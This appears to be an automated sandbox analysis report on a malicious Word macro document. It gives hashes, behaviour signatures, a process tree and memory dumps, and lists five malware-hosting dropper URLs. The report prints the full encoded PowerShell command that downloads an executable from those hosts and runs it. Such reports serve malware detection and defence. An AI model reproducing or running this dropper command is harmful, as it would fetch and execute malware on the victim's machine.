Analysis

  • max time kernel
    101s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2022 20:31

General

  • Target

    adc07b7378fe4151f14b3b95e74c2672265af06b3defc0d178101a4f3b471ef0.doc

  • Size

    146KB

  • MD5

    cb47ec5aefc0948b7d9b913faf956205

  • SHA1

    ae3a04ef0212f66894180aa705c1dab0d4f4f099

  • SHA256

    adc07b7378fe4151f14b3b95e74c2672265af06b3defc0d178101a4f3b471ef0

  • SHA512

    a098ade801394cc013aedae7b455aca52bfa04c1110adc31513afae263247b412903395f82dd52819a8cd23bdbe8e8c04470e8f0846e0efa5724b6faad73f60d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ksicardo.com/travel/ntKWzIyDl/

exe.dropper

http://iamzb.com/aspnet_client/system_web/GAAfRZMq/

exe.dropper

http://maloninc.com/apps/GbBZomQjS/

exe.dropper

http://kumakun.com/7jet/3b244672ze_btumnc0h-2178896/

exe.dropper

https://ingegneriadelweb.com/fantacalcio/8611ljoo_o4y023w-3754704371/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\adc07b7378fe4151f14b3b95e74c2672265af06b3defc0d178101a4f3b471ef0.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JABjADYANwA5ADQANQA3ADYAPQAnAE0ANwA4ADgANwAwADIAMwAnADsAJABhADYAMAA4ADkAMAA2ACAAPQAgACcANQAzADEAJwA7ACQAUAA2ADcAMAA1ADQANwA9ACcAaAAxADEAMwAyADAAMAAnADsAJABJADMANwA1ADQANAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADYAMAA4ADkAMAA2ACsAJwAuAGUAeABlACcAOwAkAEkAMAA5ADcAOQA0ADEAMAA9ACcAcAA3ADcAXwA4ADIAJwA7ACQAcQA3ADgANABfADQANAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBgAGUAYABUAC4AdwBFAGIAYwBgAGwAYABJAGUATgB0ADsAJABsAF8ANwAzADIANgA9ACcAaAB0AHQAcABzADoALwAvAGsAcwBpAGMAYQByAGQAbwAuAGMAbwBtAC8AdAByAGEAdgBlAGwALwBuAHQASwBXAHoASQB5AEQAbAAvAEAAaAB0AHQAcAA6AC8ALwBpAGEAbQB6AGIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBzAHkAcwB0AGUAbQBfAHcAZQBiAC8ARwBBAEEAZgBSAFoATQBxAC8AQABoAHQAdABwADoALwAvAG0AYQBsAG8AbgBpAG4AYwAuAGMAbwBtAC8AYQBwAHAAcwAvAEcAYgBCAFoAbwBtAFEAagBTAC8AQABoAHQAdABwADoALwAvAGsAdQBtAGEAawB1AG4ALgBjAG8AbQAvADcAagBlAHQALwAzAGIAMgA0ADQANgA3ADIAegBlAF8AYgB0AHUAbQBuAGMAMABoAC0AMgAxADcAOAA4ADkANgAvAEAAaAB0AHQAcABzADoALwAvAGkAbgBnAGUAZwBuAGUAcgBpAGEAZABlAGwAdwBlAGIALgBjAG8AbQAvAGYAYQBuAHQAYQBjAGEAbABjAGkAbwAvADgANgAxADEAbABqAG8AbwBfAG8ANAB5ADAAMgAzAHcALQAzADcANQA0ADcAMAA0ADMANwAxAC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAHcAMABfADIAXwAzADMANAA9ACcAVQA2ADgAMQA5ADQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBfADQANgA3ADEAMQA4ACAAaQBuACAAJABsAF8ANwAzADIANgApAHsAdAByAHkAewAkAHEANwA4ADQAXwA0ADQALgBEAG8AVwBuAEwAbwBBAGQARgBpAEwARQAoACQAVwBfADQANgA3ADEAMQA4ACwAIAAkAEkAMwA3ADUANAA0ADkAKQA7ACQAbgA4ADQAMAA3ADUANAA2AD0AJwBGADQAMgAwAF8AMAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAMwA3ADUANAA0ADkAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADkANQAzADMAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQASQAzADcANQA0ADQAOQA7ACQAcgA3ADQANgAyADYAPQAnAGkAOQAwADMANwAyADMAJwA7AGIAcgBlAGEAawA7ACQAaAAxADUAOAA4ADgAPQAnAEQAMwA0ADcAOAAzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOAAzADUAMwAzADUAPQAnAGoAOQAyADAANgAyACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:564

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/564-75-0x000007FEF3FA0000-0x000007FEF49C3000-memory.dmp
      Filesize

      10.1MB

    • memory/564-83-0x000000000246B000-0x000000000248A000-memory.dmp
      Filesize

      124KB

    • memory/564-82-0x0000000002464000-0x0000000002467000-memory.dmp
      Filesize

      12KB

    • memory/564-81-0x000000000246B000-0x000000000248A000-memory.dmp
      Filesize

      124KB

    • memory/564-80-0x0000000002464000-0x0000000002467000-memory.dmp
      Filesize

      12KB

    • memory/564-78-0x000000000246B000-0x000000000248A000-memory.dmp
      Filesize

      124KB

    • memory/564-76-0x000007FEF2D60000-0x000007FEF38BD000-memory.dmp
      Filesize

      11.4MB

    • memory/564-77-0x0000000002464000-0x0000000002467000-memory.dmp
      Filesize

      12KB

    • memory/1124-61-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-73-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-64-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-65-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-67-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-68-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-69-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-66-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-70-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-71-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-72-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-62-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-63-0x00000000006DE000-0x00000000006E2000-memory.dmp
      Filesize

      16KB

    • memory/1124-54-0x0000000072EA1000-0x0000000072EA4000-memory.dmp
      Filesize

      12KB

    • memory/1124-85-0x000000007190D000-0x0000000071918000-memory.dmp
      Filesize

      44KB

    • memory/1124-59-0x000000007190D000-0x0000000071918000-memory.dmp
      Filesize

      44KB

    • memory/1124-79-0x000000007190D000-0x0000000071918000-memory.dmp
      Filesize

      44KB

    • memory/1124-84-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1124-57-0x0000000075871000-0x0000000075873000-memory.dmp
      Filesize

      8KB

    • memory/1124-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1124-55-0x0000000070921000-0x0000000070923000-memory.dmp
      Filesize

      8KB

    • memory/1940-58-0x0000000000000000-mapping.dmp
    • memory/1940-60-0x000007FEFC2D1000-0x000007FEFC2D3000-memory.dmp
      Filesize

      8KB